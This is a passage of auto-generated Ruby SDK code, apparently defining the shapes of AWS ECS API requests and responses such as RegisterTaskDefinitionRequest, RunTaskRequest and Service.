Deployment.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
Deployment.struct_class = Types::Deployment
DeploymentConfiguration.add_member(:maximum_percent, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maximumPercent"))
DeploymentConfiguration.add_member(:minimum_healthy_percent, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "minimumHealthyPercent"))
DeploymentConfiguration.struct_class = Types::DeploymentConfiguration
Deployments.member = Shapes::ShapeRef.new(shape: Deployment)
DeregisterContainerInstanceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DeregisterContainerInstanceRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, required: true, location_name: "containerInstance"))
DeregisterContainerInstanceRequest.add_member(:force, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "force"))
DeregisterContainerInstanceRequest.struct_class = Types::DeregisterContainerInstanceRequest
DeregisterContainerInstanceResponse.add_member(:container_instance, Shapes::ShapeRef.new(shape: ContainerInstance, location_name: "containerInstance"))
DeregisterContainerInstanceResponse.struct_class = Types::DeregisterContainerInstanceResponse
DeregisterTaskDefinitionRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
DeregisterTaskDefinitionRequest.struct_class = Types::DeregisterTaskDefinitionRequest
DeregisterTaskDefinitionResponse.add_member(:task_definition, Shapes::ShapeRef.new(shape: TaskDefinition, location_name: "taskDefinition"))
DeregisterTaskDefinitionResponse.struct_class = Types::DeregisterTaskDefinitionResponse
DescribeClustersRequest.add_member(:clusters, Shapes::ShapeRef.new(shape: StringList, location_name: "clusters"))
DescribeClustersRequest.add_member(:include, Shapes::ShapeRef.new(shape: ClusterFieldList, location_name: "include"))
DescribeClustersRequest.struct_class = Types::DescribeClustersRequest
DescribeClustersResponse.add_member(:clusters, Shapes::ShapeRef.new(shape: Clusters, location_name: "clusters"))
DescribeClustersResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeClustersResponse.struct_class = Types::DescribeClustersResponse
DescribeContainerInstancesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DescribeContainerInstancesRequest.add_member(:container_instances, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "containerInstances"))
DescribeContainerInstancesRequest.struct_class = Types::DescribeContainerInstancesRequest
DescribeContainerInstancesResponse.add_member(:container_instances, Shapes::ShapeRef.new(shape: ContainerInstances, location_name: "containerInstances"))
DescribeContainerInstancesResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeContainerInstancesResponse.struct_class = Types::DescribeContainerInstancesResponse
DescribeServicesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DescribeServicesRequest.add_member(:services, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "services"))
DescribeServicesRequest.struct_class = Types::DescribeServicesRequest
DescribeServicesResponse.add_member(:services, Shapes::ShapeRef.new(shape: Services, location_name: "services"))
DescribeServicesResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeServicesResponse.struct_class = Types::DescribeServicesResponse
DescribeTaskDefinitionRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
DescribeTaskDefinitionRequest.struct_class = Types::DescribeTaskDefinitionRequest
DescribeTaskDefinitionResponse.add_member(:task_definition, Shapes::ShapeRef.new(shape: TaskDefinition, location_name: "taskDefinition"))
DescribeTaskDefinitionResponse.struct_class = Types::DescribeTaskDefinitionResponse
DescribeTasksRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DescribeTasksRequest.add_member(:tasks, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "tasks"))
DescribeTasksRequest.struct_class = Types::DescribeTasksRequest
DescribeTasksResponse.add_member(:tasks, Shapes::ShapeRef.new(shape: Tasks, location_name: "tasks"))
DescribeTasksResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
DescribeTasksResponse.struct_class = Types::DescribeTasksResponse
Device.add_member(:host_path, Shapes::ShapeRef.new(shape: String, required: true, location_name: "hostPath"))
Device.add_member(:container_path, Shapes::ShapeRef.new(shape: String, location_name: "containerPath"))
Device.add_member(:permissions, Shapes::ShapeRef.new(shape: DeviceCgroupPermissions, location_name: "permissions"))
Device.struct_class = Types::Device
DeviceCgroupPermissions.member = Shapes::ShapeRef.new(shape: DeviceCgroupPermission)
DevicesList.member = Shapes::ShapeRef.new(shape: Device)
DiscoverPollEndpointRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, location_name: "containerInstance"))
DiscoverPollEndpointRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
DiscoverPollEndpointRequest.struct_class = Types::DiscoverPollEndpointRequest
DiscoverPollEndpointResponse.add_member(:endpoint, Shapes::ShapeRef.new(shape: String, location_name: "endpoint"))
DiscoverPollEndpointResponse.add_member(:telemetry_endpoint, Shapes::ShapeRef.new(shape: String, location_name: "telemetryEndpoint"))
DiscoverPollEndpointResponse.struct_class = Types::DiscoverPollEndpointResponse
DockerLabelsMap.key = Shapes::ShapeRef.new(shape: String)
DockerLabelsMap.value = Shapes::ShapeRef.new(shape: String)
EnvironmentVariables.member = Shapes::ShapeRef.new(shape: KeyValuePair)
Failure.add_member(:arn, Shapes::ShapeRef.new(shape: String, location_name: "arn"))
Failure.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
Failure.struct_class = Types::Failure
Failures.member = Shapes::ShapeRef.new(shape: Failure)
HealthCheck.add_member(:command, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "command"))
HealthCheck.add_member(:interval, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "interval"))
HealthCheck.add_member(:timeout, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "timeout"))
HealthCheck.add_member(:retries, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "retries"))
HealthCheck.add_member(:start_period, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "startPeriod"))
HealthCheck.struct_class = Types::HealthCheck
HostEntry.add_member(:hostname, Shapes::ShapeRef.new(shape: String, required: true, location_name: "hostname"))
HostEntry.add_member(:ip_address, Shapes::ShapeRef.new(shape: String, required: true, location_name: "ipAddress"))
HostEntry.struct_class = Types::HostEntry
HostEntryList.member = Shapes::ShapeRef.new(shape: HostEntry)
HostVolumeProperties.add_member(:source_path, Shapes::ShapeRef.new(shape: String, location_name: "sourcePath"))
HostVolumeProperties.struct_class = Types::HostVolumeProperties
KernelCapabilities.add_member(:add, Shapes::ShapeRef.new(shape: StringList, location_name: "add"))
KernelCapabilities.add_member(:drop, Shapes::ShapeRef.new(shape: StringList, location_name: "drop"))
KernelCapabilities.struct_class = Types::KernelCapabilities
KeyValuePair.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
KeyValuePair.add_member(:value, Shapes::ShapeRef.new(shape: String, location_name: "value"))
KeyValuePair.struct_class = Types::KeyValuePair
LinuxParameters.add_member(:capabilities, Shapes::ShapeRef.new(shape: KernelCapabilities, location_name: "capabilities"))
LinuxParameters.add_member(:devices, Shapes::ShapeRef.new(shape: DevicesList, location_name: "devices"))
LinuxParameters.add_member(:init_process_enabled, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "initProcessEnabled"))
LinuxParameters.add_member(:shared_memory_size, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "sharedMemorySize"))
LinuxParameters.add_member(:tmpfs, Shapes::ShapeRef.new(shape: TmpfsList, location_name: "tmpfs"))
LinuxParameters.struct_class = Types::LinuxParameters
ListAttributesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListAttributesRequest.add_member(:target_type, Shapes::ShapeRef.new(shape: TargetType, required: true, location_name: "targetType"))
ListAttributesRequest.add_member(:attribute_name, Shapes::ShapeRef.new(shape: String, location_name: "attributeName"))
ListAttributesRequest.add_member(:attribute_value, Shapes::ShapeRef.new(shape: String, location_name: "attributeValue"))
ListAttributesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListAttributesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListAttributesRequest.struct_class = Types::ListAttributesRequest
ListAttributesResponse.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
ListAttributesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListAttributesResponse.struct_class = Types::ListAttributesResponse
ListClustersRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListClustersRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListClustersRequest.struct_class = Types::ListClustersRequest
ListClustersResponse.add_member(:cluster_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "clusterArns"))
ListClustersResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListClustersResponse.struct_class = Types::ListClustersResponse
ListContainerInstancesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListContainerInstancesRequest.add_member(:filter, Shapes::ShapeRef.new(shape: String, location_name: "filter"))
ListContainerInstancesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListContainerInstancesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListContainerInstancesRequest.add_member(:status, Shapes::ShapeRef.new(shape: ContainerInstanceStatus, location_name: "status"))
ListContainerInstancesRequest.struct_class = Types::ListContainerInstancesRequest
ListContainerInstancesResponse.add_member(:container_instance_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "containerInstanceArns"))
ListContainerInstancesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListContainerInstancesResponse.struct_class = Types::ListContainerInstancesResponse
ListServicesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListServicesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListServicesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListServicesRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
ListServicesRequest.add_member(:scheduling_strategy, Shapes::ShapeRef.new(shape: SchedulingStrategy, location_name: "schedulingStrategy"))
ListServicesRequest.struct_class = Types::ListServicesRequest
ListServicesResponse.add_member(:service_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "serviceArns"))
ListServicesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListServicesResponse.struct_class = Types::ListServicesResponse
ListTaskDefinitionFamiliesRequest.add_member(:family_prefix, Shapes::ShapeRef.new(shape: String, location_name: "familyPrefix"))
ListTaskDefinitionFamiliesRequest.add_member(:status, Shapes::ShapeRef.new(shape: TaskDefinitionFamilyStatus, location_name: "status"))
ListTaskDefinitionFamiliesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionFamiliesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListTaskDefinitionFamiliesRequest.struct_class = Types::ListTaskDefinitionFamiliesRequest
ListTaskDefinitionFamiliesResponse.add_member(:families, Shapes::ShapeRef.new(shape: StringList, location_name: "families"))
ListTaskDefinitionFamiliesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionFamiliesResponse.struct_class = Types::ListTaskDefinitionFamiliesResponse
ListTaskDefinitionsRequest.add_member(:family_prefix, Shapes::ShapeRef.new(shape: String, location_name: "familyPrefix"))
ListTaskDefinitionsRequest.add_member(:status, Shapes::ShapeRef.new(shape: TaskDefinitionStatus, location_name: "status"))
ListTaskDefinitionsRequest.add_member(:sort, Shapes::ShapeRef.new(shape: SortOrder, location_name: "sort"))
ListTaskDefinitionsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionsRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListTaskDefinitionsRequest.struct_class = Types::ListTaskDefinitionsRequest
ListTaskDefinitionsResponse.add_member(:task_definition_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "taskDefinitionArns"))
ListTaskDefinitionsResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionsResponse.struct_class = Types::ListTaskDefinitionsResponse
ListTasksRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListTasksRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, location_name: "containerInstance"))
ListTasksRequest.add_member(:family, Shapes::ShapeRef.new(shape: String, location_name: "family"))
ListTasksRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTasksRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListTasksRequest.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
ListTasksRequest.add_member(:service_name, Shapes::ShapeRef.new(shape: String, location_name: "serviceName"))
ListTasksRequest.add_member(:desired_status, Shapes::ShapeRef.new(shape: DesiredStatus, location_name: "desiredStatus"))
ListTasksRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
ListTasksRequest.struct_class = Types::ListTasksRequest
ListTasksResponse.add_member(:task_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "taskArns"))
ListTasksResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTasksResponse.struct_class = Types::ListTasksResponse
LoadBalancer.add_member(:target_group_arn, Shapes::ShapeRef.new(shape: String, location_name: "targetGroupArn"))
LoadBalancer.add_member(:load_balancer_name, Shapes::ShapeRef.new(shape: String, location_name: "loadBalancerName"))
LoadBalancer.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
LoadBalancer.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
LoadBalancer.struct_class = Types::LoadBalancer
LoadBalancers.member = Shapes::ShapeRef.new(shape: LoadBalancer)
LogConfiguration.add_member(:log_driver, Shapes::ShapeRef.new(shape: LogDriver, required: true, location_name: "logDriver"))
LogConfiguration.add_member(:options, Shapes::ShapeRef.new(shape: LogConfigurationOptionsMap, location_name: "options"))
LogConfiguration.struct_class = Types::LogConfiguration
LogConfigurationOptionsMap.key = Shapes::ShapeRef.new(shape: String)
LogConfigurationOptionsMap.value = Shapes::ShapeRef.new(shape: String)
MountPoint.add_member(:source_volume, Shapes::ShapeRef.new(shape: String, location_name: "sourceVolume"))
MountPoint.add_member(:container_path, Shapes::ShapeRef.new(shape: String, location_name: "containerPath"))
MountPoint.add_member(:read_only, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "readOnly"))
MountPoint.struct_class = Types::MountPoint
MountPointList.member = Shapes::ShapeRef.new(shape: MountPoint)
NetworkBinding.add_member(:bind_ip, Shapes::ShapeRef.new(shape: String, location_name: "bindIP"))
NetworkBinding.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
NetworkBinding.add_member(:host_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "hostPort"))
NetworkBinding.add_member(:protocol, Shapes::ShapeRef.new(shape: TransportProtocol, location_name: "protocol"))
NetworkBinding.struct_class = Types::NetworkBinding
NetworkBindings.member = Shapes::ShapeRef.new(shape: NetworkBinding)
NetworkConfiguration.add_member(:awsvpc_configuration, Shapes::ShapeRef.new(shape: AwsVpcConfiguration, location_name: "awsvpcConfiguration"))
NetworkConfiguration.struct_class = Types::NetworkConfiguration
NetworkInterface.add_member(:attachment_id, Shapes::ShapeRef.new(shape: String, location_name: "attachmentId"))
NetworkInterface.add_member(:private_ipv_4_address, Shapes::ShapeRef.new(shape: String, location_name: "privateIpv4Address"))
NetworkInterface.add_member(:ipv6_address, Shapes::ShapeRef.new(shape: String, location_name: "ipv6Address"))
NetworkInterface.struct_class = Types::NetworkInterface
NetworkInterfaces.member = Shapes::ShapeRef.new(shape: NetworkInterface)
PlacementConstraint.add_member(:type, Shapes::ShapeRef.new(shape: PlacementConstraintType, location_name: "type"))
PlacementConstraint.add_member(:expression, Shapes::ShapeRef.new(shape: String, location_name: "expression"))
PlacementConstraint.struct_class = Types::PlacementConstraint
PlacementConstraints.member = Shapes::ShapeRef.new(shape: PlacementConstraint)
PlacementStrategies.member = Shapes::ShapeRef.new(shape: PlacementStrategy)
PlacementStrategy.add_member(:type, Shapes::ShapeRef.new(shape: PlacementStrategyType, location_name: "type"))
PlacementStrategy.add_member(:field, Shapes::ShapeRef.new(shape: String, location_name: "field"))
PlacementStrategy.struct_class = Types::PlacementStrategy
PortMapping.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
PortMapping.add_member(:host_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "hostPort"))
PortMapping.add_member(:protocol, Shapes::ShapeRef.new(shape: TransportProtocol, location_name: "protocol"))
PortMapping.struct_class = Types::PortMapping
PortMappingList.member = Shapes::ShapeRef.new(shape: PortMapping)
PutAttributesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
PutAttributesRequest.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, required: true, location_name: "attributes"))
PutAttributesRequest.struct_class = Types::PutAttributesRequest
PutAttributesResponse.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
PutAttributesResponse.struct_class = Types::PutAttributesResponse
RegisterContainerInstanceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
RegisterContainerInstanceRequest.add_member(:instance_identity_document, Shapes::ShapeRef.new(shape: String, location_name: "instanceIdentityDocument"))
RegisterContainerInstanceRequest.add_member(:instance_identity_document_signature, Shapes::ShapeRef.new(shape: String, location_name: "instanceIdentityDocumentSignature"))
RegisterContainerInstanceRequest.add_member(:total_resources, Shapes::ShapeRef.new(shape: Resources, location_name: "totalResources"))
RegisterContainerInstanceRequest.add_member(:version_info, Shapes::ShapeRef.new(shape: VersionInfo, location_name: "versionInfo"))
RegisterContainerInstanceRequest.add_member(:container_instance_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerInstanceArn"))
RegisterContainerInstanceRequest.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
RegisterContainerInstanceRequest.struct_class = Types::RegisterContainerInstanceRequest
RegisterContainerInstanceResponse.add_member(:container_instance, Shapes::ShapeRef.new(shape: ContainerInstance, location_name: "containerInstance"))
RegisterContainerInstanceResponse.struct_class = Types::RegisterContainerInstanceResponse
RegisterTaskDefinitionRequest.add_member(:family, Shapes::ShapeRef.new(shape: String, required: true, location_name: "family"))
RegisterTaskDefinitionRequest.add_member(:task_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskRoleArn"))
RegisterTaskDefinitionRequest.add_member(:execution_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "executionRoleArn"))
RegisterTaskDefinitionRequest.add_member(:network_mode, Shapes::ShapeRef.new(shape: NetworkMode, location_name: "networkMode"))
RegisterTaskDefinitionRequest.add_member(:container_definitions, Shapes::ShapeRef.new(shape: ContainerDefinitions, required: true, location_name: "containerDefinitions"))
RegisterTaskDefinitionRequest.add_member(:volumes, Shapes::ShapeRef.new(shape: VolumeList, location_name: "volumes"))
RegisterTaskDefinitionRequest.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraints, location_name: "placementConstraints"))
RegisterTaskDefinitionRequest.add_member(:requires_compatibilities, Shapes::ShapeRef.new(shape: CompatibilityList, location_name: "requiresCompatibilities"))
RegisterTaskDefinitionRequest.add_member(:cpu, Shapes::ShapeRef.new(shape: String, location_name: "cpu"))
RegisterTaskDefinitionRequest.add_member(:memory, Shapes::ShapeRef.new(shape: String, location_name: "memory"))
RegisterTaskDefinitionRequest.struct_class = Types::RegisterTaskDefinitionRequest
RegisterTaskDefinitionResponse.add_member(:task_definition, Shapes::ShapeRef.new(shape: TaskDefinition, location_name: "taskDefinition"))
RegisterTaskDefinitionResponse.struct_class = Types::RegisterTaskDefinitionResponse
RepositoryCredentials.add_member(:credentials_parameter, Shapes::ShapeRef.new(shape: String, required: true, location_name: "credentialsParameter"))
RepositoryCredentials.struct_class = Types::RepositoryCredentials
RequiresAttributes.member = Shapes::ShapeRef.new(shape: Attribute)
Resource.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
Resource.add_member(:type, Shapes::ShapeRef.new(shape: String, location_name: "type"))
Resource.add_member(:double_value, Shapes::ShapeRef.new(shape: Double, location_name: "doubleValue"))
Resource.add_member(:long_value, Shapes::ShapeRef.new(shape: Long, location_name: "longValue"))
Resource.add_member(:integer_value, Shapes::ShapeRef.new(shape: Integer, location_name: "integerValue"))
Resource.add_member(:string_set_value, Shapes::ShapeRef.new(shape: StringList, location_name: "stringSetValue"))
Resource.struct_class = Types::Resource
Resources.member = Shapes::ShapeRef.new(shape: Resource)
RunTaskRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
RunTaskRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
RunTaskRequest.add_member(:overrides, Shapes::ShapeRef.new(shape: TaskOverride, location_name: "overrides"))
RunTaskRequest.add_member(:count, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "count"))
RunTaskRequest.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
RunTaskRequest.add_member(:group, Shapes::ShapeRef.new(shape: String, location_name: "group"))
RunTaskRequest.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: PlacementConstraints, location_name: "placementConstraints"))
RunTaskRequest.add_member(:placement_strategy, Shapes::ShapeRef.new(shape: PlacementStrategies, location_name: "placementStrategy"))
RunTaskRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
RunTaskRequest.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
RunTaskRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
RunTaskRequest.struct_class = Types::RunTaskRequest
RunTaskResponse.add_member(:tasks, Shapes::ShapeRef.new(shape: Tasks, location_name: "tasks"))
RunTaskResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
RunTaskResponse.struct_class = Types::RunTaskResponse
Service.add_member(:service_arn, Shapes::ShapeRef.new(shape: String, location_name: "serviceArn"))
Service.add_member(:service_name, Shapes::ShapeRef.new(shape: String, location_name: "serviceName"))
Service.add_member(:cluster_arn, Shapes::ShapeRef.new(shape: String, location_name: "clusterArn"))
Service.add_member(:load_balancers, Shapes::ShapeRef.new(shape: LoadBalancers, location_name: "loadBalancers"))
Service.add_member(:service_registries, Shapes::ShapeRef.new(shape: ServiceRegistries, location_name: "serviceRegistries"))
Service.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Service.add_member(:desired_count, Shapes::ShapeRef.new(shape: Integer, location_name: "desiredCount"))
Service.add_member(:running_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningCount"))
Service.add_member(:pending_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingCount"))
Service.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
Service.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
Service.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinition"))
Service.add_member(:deployment_configuration, Shapes::ShapeRef.new(shape: DeploymentConfiguration, location_name: "deploymentConfiguration"))
Service.add_member(:deployments, Shapes::ShapeRef.new(shape: Deployments, location_name: "deployments"))
Service.add_member(:role_arn, Shapes::ShapeRef.new(shape: String, location_name: "roleArn"))
Service.add_member(:events, Shapes::ShapeRef.new(shape: ServiceEvents, location_name: "events"))
Service.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
Service.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: PlacementConstraints, location_name: "placementConstraints"))
Service.add_member(:placement_strategy, Shapes::ShapeRef.new(shape: PlacementStrategies, location_name: "placementStrategy"))
Service.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
Service.add_member(:health_check_grace_period_seconds, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "healthCheckGracePeriodSeconds"))
Service.add_member(:scheduling_strategy, Shapes::ShapeRef.new(shape: SchedulingStrategy, location_name: "schedulingStrategy"))
Service.struct_class = Types::Service
ServiceEvent.add_member(:id, Shapes::ShapeRef.new(shape: String, location_name: "id"))
ServiceEvent.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
ServiceEvent.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "message"))
ServiceEvent.struct_class = Types::ServiceEvent
ServiceEvents.member = Shapes::ShapeRef.new(shape: ServiceEvent)
ServiceRegistries.member = Shapes::ShapeRef.new(shape: ServiceRegistry)
ServiceRegistry.add_member(:registry_arn, Shapes::ShapeRef.new(shape: String, location_name: "registryArn"))
ServiceRegistry.add_member(:port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "port"))
ServiceRegistry.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
ServiceRegistry.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
ServiceRegistry.struct_class = Types::ServiceRegistry
Services.member = Shapes::ShapeRef.new(shape: Service)
StartTaskRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
StartTaskRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
StartTaskRequest.add_member(:overrides, Shapes::ShapeRef.new(shape: TaskOverride, location_name: "overrides"))
StartTaskRequest.add_member(:container_instances, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "containerInstances"))
StartTaskRequest.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
StartTaskRequest.add_member(:group, Shapes::ShapeRef.new(shape: String, location_name: "group"))
StartTaskRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
StartTaskRequest.struct_class = Types::StartTaskRequest
StartTaskResponse.add_member(:tasks, Shapes::ShapeRef.new(shape: Tasks, location_name: "tasks"))
StartTaskResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
StartTaskResponse.struct_class = Types::StartTaskResponse
Statistics.member = Shapes::ShapeRef.new(shape: KeyValuePair)
StopTaskRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
StopTaskRequest.add_member(:task, Shapes::ShapeRef.new(shape: String, required: true, location_name: "task"))
StopTaskRequest.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
StopTaskRequest.struct_class = Types::StopTaskRequest
StopTaskResponse.add_member(:task, Shapes::ShapeRef.new(shape: Task, location_name: "task"))
StopTaskResponse.struct_class = Types::StopTaskResponse
StringList.member = Shapes::ShapeRef.new(shape: String)
SubmitContainerStateChangeRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
SubmitContainerStateChangeRequest.add_member(:task, Shapes::ShapeRef.new(shape: String, location_name: "task"))
SubmitContainerStateChangeRequest.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
SubmitContainerStateChangeRequest.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
SubmitContainerStateChangeRequest.add_member(:exit_code, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "exitCode"))
SubmitContainerStateChangeRequest.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
SubmitContainerStateChangeRequest.add_member(:network_bindings, Shapes::ShapeRef.new(shape: NetworkBindings, location_name: "networkBindings"))
SubmitContainerStateChangeRequest.struct_class = Types::SubmitContainerStateChangeRequest
SubmitContainerStateChangeResponse.add_member(:acknowledgment, Shapes::ShapeRef.new(shape: String, location_name: "acknowledgment"))
SubmitContainerStateChangeResponse.struct_class = Types::SubmitContainerStateChangeResponse
SubmitTaskStateChangeRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
SubmitTaskStateChangeRequest.add_member(:task, Shapes::ShapeRef.new(shape: String, location_name: "task"))
SubmitTaskStateChangeRequest.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
SubmitTaskStateChangeRequest.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
SubmitTaskStateChangeRequest.add_member(:containers, Shapes::ShapeRef.new(shape: ContainerStateChanges, location_name: "containers"))
SubmitTaskStateChangeRequest.add_member(:attachments, Shapes::ShapeRef.new(shape: AttachmentStateChanges, location_name: "attachments"))
SubmitTaskStateChangeRequest.add_member(:pull_started_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStartedAt"))
